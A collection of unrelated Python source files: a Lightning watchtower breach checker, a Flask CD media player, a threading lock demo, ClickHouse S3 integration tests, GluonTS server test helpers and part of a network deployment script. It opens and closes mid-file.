Cleaner.delete_appointment_from_memory(uuid, self.appointments, self.locator_uuid_map)
triggered_flags.append(uuid)
else:
appointments_to_delete.append(uuid)
# Appointments are only flagged as triggered if they are delivered, otherwise they are just deleted.
appointments_to_delete.extend(invalid_breaches)
appointments_to_delete_gatekeeper = {
uuid: self.appointments[uuid].get("user_id") for uuid in appointments_to_delete
}
self.db_manager.batch_create_triggered_appointment_flag(triggered_flags)
Cleaner.delete_appointments(
appointments_to_delete, self.appointments, self.locator_uuid_map, self.db_manager
)
# Remove invalid appointments from the Gatekeeper
self.gatekeeper.delete_appointments(appointments_to_delete_gatekeeper)
if not self.appointments:
self.logger.info("No more pending appointments")
# Register the last processed block for the Watcher
self.db_manager.store_last_block_hash_watcher(block_hash)
self.last_known_block = block.get("hash")
self.block_queue.task_done()
def get_breaches(self, locator_txid_map):
"""
Gets a dictionary of channel breaches given a map of ``locator:dispute_txid``.
Args:
locator_txid_map (:obj:`dict`): the dictionary of locators (locator:txid) derived from a list of
transaction ids.
Returns:
:obj:`dict`: A dictionary (``locator:txid``) with all the breaches found. An empty dictionary if none are
found.
"""
# Check is any of the tx_ids in the received block is an actual match
intersection = set(self.locator_uuid_map.keys()).intersection(locator_txid_map.keys())
breaches = {locator: locator_txid_map[locator] for locator in intersection}
if len(breaches) > 0:
self.logger.info("List of breaches", breaches=breaches)
else:
self.logger.info("No breaches found")
return breaches
def check_breach(self, uuid, appointment, dispute_txid):
"""
Checks if a breach is valid. Valid breaches should decrypt to a valid transaction.
Args:
uuid (:obj:`str`): the uuid of the appointment that was triggered by the breach.
appointment (:obj:`ExtendedAppointment <teos.extended_appointment.ExtendedAppointment>`): the appointment
data.
dispute_txid (:obj:`str`): the id of the transaction that triggered the breach.
Returns:
:obj:`tuple`: A tuple containing the penalty txid and the raw penalty tx.
Raises:
:obj:`EncryptionError`: if the encrypted blob from the provided appointment cannot be decrypted with the
key derived from the breach transaction id.
:obj:`InvalidTransactionFormat`: if the decrypted data does not have a valid transaction format.
"""
try:
penalty_rawtx = Cryptographer.decrypt(appointment.encrypted_blob, dispute_txid)
penalty_tx = self.block_processor.decode_raw_transaction(penalty_rawtx, blocking=True)
except EncryptionError as e:
self.logger.info("Transaction cannot be decrypted", uuid=uuid)
raise e
except InvalidTransactionFormat as e:
self.logger.info("The breach contained an invalid transaction", uuid=uuid)
raise e
self.logger.info(
"Breach found for locator", locator=appointment.locator, uuid=uuid, penalty_txid=penalty_tx.get("txid")
)
return penalty_tx.get("txid"), penalty_rawtx
def filter_breaches(self, breaches):
"""
Filters the valid from the invalid channel breaches.
The :obj:`Watcher` cannot know if an ``encrypted_blob`` contains a valid transaction until a breach is seen.
Blobs that contain arbitrary data are dropped and not sent to the :obj:`Responder <teos.responder.Responder>`.
Args:
breaches (:obj:`dict`): a dictionary containing channel breaches (``locator:txid``).
Returns:
:obj:`tuple`: A dictionary and a list. The former contains the valid breaches, while the latter contain the
invalid ones.
The valid breaches dictionary has the following structure:
``{locator, dispute_txid, penalty_txid, penalty_rawtx}``
"""
valid_breaches = {}
invalid_breaches = []
# A cache of the already decrypted blobs so replicate decryption can be avoided
decrypted_blobs = {}
for locator, dispute_txid in breaches.items():
for uuid in self.locator_uuid_map[locator]:
appointment = ExtendedAppointment.from_dict(self.db_manager.load_watcher_appointment(uuid))
if appointment.encrypted_blob in decrypted_blobs:
penalty_txid, penalty_rawtx = decrypted_blobs[appointment.encrypted_blob]
valid_breaches[uuid] = {
"locator": appointment.locator,
"dispute_txid": dispute_txid,
"penalty_txid": penalty_txid,
"penalty_rawtx": penalty_rawtx,
}
else:
try:
penalty_txid, penalty_rawtx = self.check_breach(uuid, appointment, dispute_txid)
valid_breaches[uuid] = {
"locator": appointment.locator,
"dispute_txid": dispute_txid,
"penalty_txid": penalty_txid,
"penalty_rawtx": penalty_rawtx,
}
decrypted_blobs[appointment.encrypted_blob] = (penalty_txid, penalty_rawtx)
except (EncryptionError, InvalidTransactionFormat):
invalid_breaches.append(uuid)
return valid_breaches, invalid_breaches
def get_registered_user_ids(self):
return self.gatekeeper.user_ids
def get_user_info(self, user_id):
"""
Returns the data held by the tower about the user given an ``user_id``.
Args:
user_id (:obj:`str`): the id of the requested user.
Returns:
:obj:`UserInfo <teos.gatekeeper.UserInfo> or :obj:`None`: The user data if found. :obj:`None` if not found,
or the ``user_id`` is invalid.
"""
return self.gatekeeper.get_user_info(user_id)
def get_subscription_info(self, signature):
"""
Gets information about a user's subscription.
Args:
signature (:obj:`str`): the signature of the request by the user.
Returns:
:obj:`tuple`: A 2-item tuple containing the user info (:obj:`UserInfo <teos.gatekeeper.UserInfo>) and the
list of locators associated with the appointments that match the subscription.
Raises:
:obj:`AuthenticationFailure`: if the user cannot be authenticated.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
message = "get subscription info".encode("utf-8")
user_id = self.gatekeeper.authenticate_user(message, signature)
has_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
subscription_info = self.gatekeeper.get_user_info(user_id)
with self.rw_lock.gen_rlock():
locators = []
for appt_uuid in subscription_info.appointments:
if appt_uuid in self.appointments:
locators.append(self.appointments.get(appt_uuid).get("locator"))
elif self.responder.has_tracker(appt_uuid):
locators.append(self.responder.get_tracker(appt_uuid).get("locator"))
else:
self.logger.debug("The appointment uuid was not found in the watcher or the responder.")
return subscription_info, locators
def get_all_watcher_appointments(self):
"""Returns a dictionary with all the appointment stored in the db for the watcher."""
return self.db_manager.load_watcher_appointments()
def get_all_responder_trackers(self):
"""Returns a dictionary with all the trackers stored in the db for the responder."""
return self.db_manager.load_responder_trackers()
|
main.py
|
from threading import Thread
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import logging
from time import sleep
from classes.MediaPlayer import MediaPlayer
from classes.MediaPlayerConfig import MediaPlayerConfig
import pyudev
config = MediaPlayerConfig('media_player.conf')
cad = None
try:
from classes.MediaPlayerPiFaceCAD import MediaPlayerPiFaceCAD
from pifacecad.core import NoPiFaceCADDetectedError
cad = MediaPlayerPiFaceCAD(config)
except ImportError:
print('NO PIFACECAD LIBRARY FOUND')
except NoPiFaceCADDetectedError:
print('NO PIFACECAD FOUND')
media_player = MediaPlayer(config)
# Web server configuration
app = Flask(__name__, template_folder="web", static_folder="web/static", static_url_path="/static")
app.debug = False
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
socket = SocketIO(app, async_mode='threading')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/getMediaPlayerInfo')
def info():
return config['NAME']
for event in ['connect', 'reconnect']:
@socket.on(event)
def ws_connect():
emit('status', 'connected')
socket.emit('media_player_info', media_player.get_current_info(True, True, True, True, True).as_dict())
sleep(1)
socket.emit('media_player_info', media_player.get_current_info().as_dict())
print('connected')
@socket.on('disconnect')
def ws_disconnect():
print('disconnected')
@socket.on('getCurTrackInfo')
def ws_get_current_track_info():
socket.emit('media_player_info', media_player.get_current_info(True, True, True, True, True).as_dict())
@socket.on('playFile')
def ws_play_file(data):
media_library_type = None
if data['mediaLibraryType'] == 'artists':
media_library_type = MediaPlayer.BranchType.ARTISTS
elif data['mediaLibraryType'] == 'albums':
media_library_type = MediaPlayer.BranchType.ALBUMS
elif data['mediaLibraryType'] == 'folders':
media_library_type = MediaPlayer.BranchType.FOLDERS
media_player.play_file(media_library_type, data['indexes'])
@socket.on('playFolder')
def ws_play_folder(data):
media_player.play_file(MediaPlayer.BranchType.FOLDERS, (data['folderIndex'], None, None, 0))
@socket.on('playArtist')
def ws_play_artist(data):
media_player.play_file(MediaPlayer.BranchType.ARTISTS, (None, data['artistIndex'], None, 0))
@socket.on('playAlbum')
def ws_play_album(data):
media_player.play_file(MediaPlayer.BranchType.ALBUMS, (None, data['artistIndex'], data['albumIndex'], 0))
@socket.on('playTrack')
def ws_play_track(data):
media_player.play_track(data['trackNumber'])
@socket.on('prevBranch')
def ws_prev_branch():
media_player.prev_branch()
@socket.on('nextBranch')
def ws_next_branch():
media_player.next_branch()
@socket.on('prevTrack')
def ws_prev_track():
media_player.prev_track()
@socket.on('nextTrack')
def ws_next_track():
media_player.next_track()
@socket.on('volumeUp')
def ws_volume_up():
media_player.volume_up()
@socket.on('volumeDown')
def ws_volume_down():
media_player.volume_down()
@socket.on('play')
def ws_play():
media_player.play_pause()
@socket.on('pause')
def ws_pause():
media_player.play_pause()
@socket.on('eject')
def ws_eject():
cad.destroy()
media_player.stop()
@socket.on('seek')
def ws_seek(data):
media_player.seek(data['seekPercent'])
# Web server thread starting point
def start_web_server():
"""
Starts web server
:return: None
"""
if __name__ == '__main__':
socket.run(app, config['WEB_IP'],
port=config['WEB_PORT'])
# Start web server thread
web_server_thread = Thread(target=start_web_server, args=[])
web_server_thread.setDaemon(True)
web_server_thread.start()
def play_cd(media_player, cad):
media_player.try_play_cd()
if media_player.is_running:
if cad is not None:
cad.init(media_player)
while media_player.is_running:
for info in iter(media_player.poll_info, None):
print(info.as_dict())
socket.emit('media_player_info', info.as_dict())
sleep(0.2)
if cad is not None:
cad.destroy()
socket.emit('media_player_info', media_player.get_current_info().as_dict())
# Eject button
if cad is not None:
eject_listener = MediaPlayerPiFaceCAD.create_eject_listener(media_player)
play_cd(media_player, cad)
# check udev for USB changes (including CD insertion)
udev_context = pyudev.Context()
udev_monitor = pyudev.Monitor.from_netlink(udev_context)
udev_monitor.filter_by(subsystem='block')
for device in iter(udev_monitor.poll, None):
if device.action == 'change' or device.action == 'add':
sleep(1)
play_cd(media_player, cad)
|
t3.py
|
import threading
# global variable x
x = 0
def plus():
global x
x += 1
def thread_task(lock):
for _ in range(100000):
lock.acquire()
plus()
lock.release()
def main_task():
global x
x = 0
# creating a lock
lock = threading.Lock()
# creating threads
t1 = threading.Thread(target=thread_task, args=(lock,))
t2 = threading.Thread(target=thread_task, args=(lock,))
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(10):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
test.py
|
import json
import logging
import random
import threading
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
import helpers.client
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename):
# type: (ClickHouseCluster, str) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = ""
for chunk in data.stream():
data_str += chunk
return data_str
# Returns nginx access log lines.
def get_nginx_access_logs():
handle = open("/nginx/access.log", "r")
data = handle.readlines()
handle.close()
return data
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"], with_minio=True)
cluster.add_instance("dummy", with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i+j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False)
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes / one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use Nginx access logs to count number of parts uploaded to Minio.
nginx_logs = get_nginx_access_logs()
uploaded_parts = filter(lambda log_line: log_line.find(filename) >= 0 and log_line.find("PUT") >= 0, nginx_logs)
assert len(uploaded_parts) > 1
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night+nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
|
shell.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# Standard library imports
import json
import socket
import tempfile
import time
from contextlib import closing, contextmanager
from multiprocessing import Process
from pathlib import Path
from typing import Any, ContextManager, Dict, Optional, Type, Iterable, List
import requests
# First-party imports
from gluonts.dataset.common import DataEntry, serialize_data_entry
from gluonts.dataset.repository.datasets import materialize_dataset
from gluonts.model.predictor import Predictor
from gluonts.shell.sagemaker import ServeEnv, ServePaths, TrainEnv, TrainPaths
from gluonts.shell.sagemaker.params import encode_sagemaker_parameters
from gluonts.shell.serve import Settings, make_gunicorn_app
class ServerFacade:
"""
A convenience wrapper for sending requests and handling responses to
an inference server located at the given address.
"""
def __init__(self, base_address: str) -> None:
self.base_address = base_address
def url(self, path) -> str:
return self.base_address + path
def ping(self) -> bool:
try:
response = requests.get(url=self.url("/ping"))
return response.status_code == 200
except requests.exceptions.ConnectionError:
return False
def execution_parameters(self) -> dict:
response = requests.get(
url=self.url("/execution-parameters"),
headers={"Accept": "application/json"},
)
if response.status_code == 200:
return response.json()
elif response.status_code >= 400:
raise RuntimeError(response.content.decode("utf-8"))
else:
raise RuntimeError(f"Unexpected {response.status_code} response")
def invocations(
self, data_entries: Iterable[DataEntry], configuration: dict
) -> List[dict]:
instances = list(map(serialize_data_entry, data_entries))
response = requests.post(
url=self.url("/invocations"),
json={"instances": instances, "configuration": configuration},
headers={"Accept": "application/json"},
)
if response.status_code == 200:
predictions = response.json()["predictions"]
assert len(predictions) == len(instances)
return predictions
elif response.status_code >= 400:
raise RuntimeError(response.content.decode("utf-8"))
else:
raise RuntimeError(f"Unexpected {response.status_code} response")
def batch_invocations(
self, data_entries: Iterable[DataEntry]
) -> List[dict]:
instances = map(serialize_data_entry, data_entries)
instances = list(map(json.dumps, instances))
response = requests.post(
url=self.url("/invocations"), data="\n".join(instances)
)
assert response.status_code == 200
predictions = list(map(json.loads, response.text.splitlines()))
assert len(predictions) == len(instances)
return predictions
def free_port() -> int:
"""Returns a random unbound port."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(("", 0))
return sock.getsockname()[1]
@contextmanager # type: ignore
def temporary_server(
env: ServeEnv,
forecaster_type: Optional[Type[Predictor]],
settings: Settings = Settings(),
) -> ContextManager[ServerFacade]:
"""
A context manager that instantiates a Gunicorn inference server in a
separate process (using the :func:`make_inference_server` call)
Parameters
----------
env
The :class:`ServeEnv` to use in static inference mode.
Either `env` or `forecaster_type` must be set.
forecaster_type
The :class:`Predictor` type to use in dynamic inference mode.
Either `env` or `forecaster_type` must be set.
settings
Settings to use when instantiating the Gunicorn server.
Returns
-------
ContextManager[ServerFacade]
A context manager that yields the :class:`InferenceServer` instance
wrapping the spawned inference server.
"""
gunicorn_app = make_gunicorn_app(env, forecaster_type, settings)
process = Process(target=gunicorn_app.run)
process.start()
endpoint = ServerFacade(
base_address="http://{address}:{port}".format(
address=settings.sagemaker_server_address,
port=settings.sagemaker_server_port,
)
)
# try to ping the server (signalling liveness)
# poll for n seconds in t second intervals
n, t = 10, 2
max_time = time.time() + n
while not endpoint.ping():
if time.time() < max_time:
time.sleep(t)
else:
msg = f"Failed to start the inference server within {n} seconds"
raise TimeoutError(msg)
yield endpoint
process.terminate()
process.join()
@contextmanager # type: ignore
def temporary_train_env(
hyperparameters: Dict[str, Any], dataset_name: str
) -> ContextManager[TrainEnv]:
"""
A context manager that instantiates a training environment from a given
combination of `hyperparameters` and `dataset_name` in a temporary
directory and removes the directory on exit.
Parameters
----------
hyperparameters
The name of the repository dataset to use when instantiating the
training environment.
dataset_name
The name of the repository dataset to use when instantiating the
training environment.
Returns
-------
ContextManager[TrainEnv]
A context manager that yields the :class:`TrainEnv` instance.
"""
with tempfile.TemporaryDirectory(prefix="gluonts-train-env") as base:
paths = TrainPaths(base=Path(base))
# write hyperparameters
with paths.hyperparameters.open(mode="w") as fp:
hps_encoded = encode_sagemaker_parameters(hyperparameters)
json.dump(hps_encoded, fp, indent=2, sort_keys=True)
# save dataset
ds_path = materialize_dataset(dataset_name)
path_metadata = paths.data / "metadata" / "metadata.json"
path_train = paths.data / "train"
path_test = paths.data / "test"
path_metadata.parent.mkdir(exist_ok=True)
path_metadata.symlink_to(ds_path / "metadata.json")
path_train.symlink_to(ds_path / "train", target_is_directory=True)
path_test.symlink_to(ds_path / "test", target_is_directory=True)
yield TrainEnv(path=paths.base)
@contextmanager # type: ignore
def temporary_serve_env(predictor: Predictor) -> ContextManager[ServeEnv]:
"""
A context manager that instantiates a serve environment for a given
:class:`Predictor` in a temporary directory and removes the directory on
exit.
Parameters
----------
predictor
A predictor to serialize in :class:`ServeEnv` `model` folder.
Returns
-------
ContextManager[TrainEnv]
A context manager that yields the :class:`ServeEnv` instance.
"""
with tempfile.TemporaryDirectory(prefix="gluonts-serve-env") as base:
paths = ServePaths(base=Path(base))
# serialize model
predictor.serialize(paths.model)
yield ServeEnv(path=paths.base)
|
bosi.py
|
# Copyright 2018 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import datetime
import lib.constants as const
import os
import Queue
import random
import subprocess32 as subprocess
import threading
import time
import yaml
from collections import OrderedDict
from lib.environment import Environment
from lib.helper import Helper
from lib.util import safe_print
# queue to store all controller nodes
controller_node_q = Queue.Queue()
# queue to store all nodes
node_q = Queue.Queue()
# copy the node_q to this when original list is created
certify_node_q = Queue.Queue()
verify_node_q = Queue.Queue()
support_node_q = Queue.Queue()
# keep track of verified nodes
node_pass = {}
node_fail = {}
# result dict
node_dict = {}
time_dict = {}
def worker_upgrade_or_sriov_node(q):
while True:
node = q.get()
# copy ivs pkg to node
Helper.copy_pkg_scripts_to_remote(node)
# deploy node
safe_print("Start to deploy %(fqdn)s\n" %
{'fqdn': node.fqdn})
start_time = datetime.datetime.now()
if node.role == const.ROLE_SRIOV:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_sriov.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
elif node.role in const.DPDK_ROLES:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_dpdk.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
else:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_upgrade.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
end_time = datetime.datetime.now()
# parse setup log
diff = Helper.timedelta_total_seconds(end_time - start_time)
node.set_time_diff(diff)
node = Helper.update_last_log(node)
node_dict[node.fqdn] = node
time_dict[node.fqdn] = diff
safe_print("Finish executing script for node %(fqdn)s, "
"cost time: %(diff).2f\n" %
{'fqdn': node.fqdn, 'diff': node.time_diff})
q.task_done()
def worker_setup_node(q):
while True:
node = q.get()
# copy ivs pkg to node
Helper.copy_pkg_scripts_to_remote(node)
# deploy node
safe_print("Start to deploy %(fqdn)s\n" %
{'fqdn': node.fqdn})
if node.cleanup and node.role == const.ROLE_NEUTRON_SERVER:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_ospurge.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
# a random delay to smooth apt-get/yum
delay = random.random() * 10.0
time.sleep(delay)
start_time = datetime.datetime.now()
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
end_time = datetime.datetime.now()
# parse setup log
diff = Helper.timedelta_total_seconds(end_time - start_time)
node.set_time_diff(diff)
node = Helper.update_last_log(node)
node_dict[node.fqdn] = node
time_dict[node.fqdn] = diff
# when deploying T5 on UBUNTU, reboot compute nodes
Helper.reboot_if_necessary(node)
safe_print("Finish deploying %(fqdn)s, cost time: %(diff).2f\n" %
{'fqdn': node.fqdn, 'diff': node.time_diff})
q.task_done()
def certify_node_setup(q):
while True:
node = q.get()
if node.certificate_dir:
if not os.path.isfile("%s/ca.cert" % node.certificate_dir):
safe_print("Missing ca.cert in %s\n" % node.certificate_dir)
break
Helper.certify_node(node)
q.task_done()
def support_node_setup(q):
while True:
node = q.get()
Helper.support_node(node)
q.task_done()
def verify_node_setup(q):
while True:
node = q.get()
all_service_status = 'Service status for node: ' + node.fqdn
# check services are running and IVS version is correct
if node.deploy_dhcp_agent:
dhcp_status = Helper.check_os_service_status(
node, "neutron-dhcp-agent")
all_service_status = (all_service_status +
' | DHCP Agent ' + dhcp_status)
metadata_status = Helper.check_os_service_status(
node, "neutron-metadata-agent")
all_service_status = (all_service_status +
' | Metadata Agent ' + metadata_status)
if node.deploy_l3_agent and node.deploy_mode == const.T5:
l3_status = Helper.check_os_service_status(
node, "neutron-l3-agent")
all_service_status = (all_service_status +
' | L3 Agent ' + l3_status)
# for T5 deployment, check LLDP service status on compute nodes
if node.deploy_mode == const.T5 and node.role != const.ROLE_NEUTRON_SERVER:
lldp_status = Helper.check_os_service_status(node, "send_lldp")
all_service_status = (all_service_status +
' | LLDP Service ' + lldp_status)
# for T6 deployment, check IVS status and version too
if node.deploy_mode == const.T6:
# check ivs status and version
ivs_status = Helper.check_os_service_status(node, "ivs")
if ivs_status == ':-)':
